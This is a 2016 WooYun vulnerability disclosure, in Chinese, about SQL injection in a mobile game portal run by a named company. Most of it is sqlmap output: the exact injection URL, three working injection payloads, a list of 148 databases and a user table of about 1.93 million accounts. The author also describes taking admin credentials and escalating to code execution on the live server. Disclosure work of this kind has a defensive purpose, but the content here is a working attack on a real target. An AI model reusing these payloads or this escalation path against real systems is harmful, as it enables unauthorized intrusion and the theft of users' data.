漏洞概要 关注数(4) 关注此漏洞
缺陷编号: WooYun-2016-179486
漏洞标题: 某手机网游门户网站 SQL注入提权
相关厂商: 杭州快定网络股份有限公司
漏洞作者: sysALong
提交时间: 2016-02-29 15:58
公开时间: 2016-04-14 15:58
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 20
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系
Tags标签: Mysql
漏洞详情
披露状态:
2016-02-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-04-14: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
某公司手机网游门户网站
详细说明:
注入点:http://api.a.7xz.com:80/v181/newhtmldetail?gameid=dhhsdw&newsid=161156&frm=ngnews
[11:41:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5
[11:41:27] [INFO] resumed: 1931861
Database: new_bbs
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| pre_ucenter_members | 1931861 |
+---------------------+---------+
193W的用户数据呢。
漏洞证明:
Parameter: gameid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gameid=dhhsdw' AND 3297=3297 AND 'Obqq'='Obqq&newsid=161156
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: gameid=dhhsdw' AND (SELECT 8395 FROM(SELECT COUNT(*),CONCAT(0x71786a7871,(SELECT (ELT(8395=8395,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dYet'='dYet&newsid=161156
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gameid=dhhsdw' AND (SELECT * FROM (SELECT(SLEEP(5)))zaCE) AND 'bzJZ'='bzJZ&newsid=161156
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
available databases [148]:
[*] 7xzass
[*] admin
[*] ahzs
[*] amdzz
[*] aqgy
[*] bbstmp
[*] bbzs
[*] bhwz
[*] bhxy
[*] bydr2
[*] bzws
[*] bzwx
[*] ccqne
[*] cjyx
[*] cp
[*] cszs
[*] dhll
[*] dntghd
[*] dq
[*] dtcq
[*] dtlm
[*] dtns
[*] dxjh
[*] dxxd
[*] embya
[*] fbcs
[*] fcjlk
[*] fcxwz
[*] fjsg
[*] fknsg
[*] fsmm
[*] gbsg
[*] gdjh
[*] gdzh
[*] ggsg
[*] gsd
[*] gslc
[*] hagn
[*] hdqb
[*] hdzl
[*] hh
[*] hmwz
[*] hszy
[*] information_schema
[*] jfyzz
[*] jianwang3
[*] jjbjl
[*] jrzsh
[*] js2014
[*] jscq
[*] jstf
[*] jthree
[*] jw3
[*] jwt
[*] kdhzw
[*] kkams
[*] ldxy
[*] ldyx
[*] log
[*] lovelive
[*] lsq
[*] lszr
[*] lzqst
[*] lzqz
[*] lzsh
[*] mjazz
[*] mlbb
[*] mlkwy
[*] mlzh
[*] mmzb
[*] mnxy
[*] mstzq
[*] msysg
[*] mwslz
[*] mxhzw
[*] my
[*] mysql
[*] myx
[*] new_bbs
[*] news
[*] ngnews
[*] ngnewsback
[*] nnhysj
[*] ppsg
[*] pzsgz
[*] qbpkq
[*] qmfs
[*] qmqj
[*] qmqz
[*] qsmy
[*] qy
[*] rzsg
[*] sdmb
[*] sghhr
[*] sghx
[*] sgz
[*] shouji
[*] shoujibackup
[*] sj2
[*] sjh
[*] sjhx
[*] skjlb
[*] slzj
[*] sm
[*] smdl
[*] ssdyx
[*] swsy
[*] szr
[*] tdd
[*] temp
[*] test
[*] tfqyz
[*] tmsj2
[*] tsdg
[*] ttamx
[*] ttaxy
[*] ttxw
[*] txhd
[*] wangmeng
[*] wdbl
[*] whcl
[*] wkqne
[*] wmsh
[*] wqhy
[*] wshy
[*] wxqz2
[*] xajh
[*] xqol
[*] xxsr
[*] xyyjz
[*] xz
[*] yhzs
[*] yqzzz
[*] yxdb
[*] yxjt
[*] yxzj
[*] yykb
[*] yzqx
[*] yzr
[*] yzsj
[*] zghwd
[*] zgmh
[*] zhtb
[*] zjtx
[*] zmxy
[*] zqdnx
[*] zslm
[*] zzjh
最后获取管理员帐号密码
然后提权,,,,提权费了一些波折,各种目录都不可写,就是有ROOT权限也白费。。。不过最后最后。。看此文章。。。
WooYun: phpcms v9 后台远程代码执行漏洞(第三弹) 因为有帐号和密码 CMD5解密。
写入既可。。
修复方案:
最后发现,在我来之前,已经有大牛路过了。。。。我只是从新走了一遍大牛所走的路。。。。
赶紧修复把。。193W的用户数据呢。估计早早就被脱干净了。。。。
版权声明:转载请注明来源 sysALong@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
评论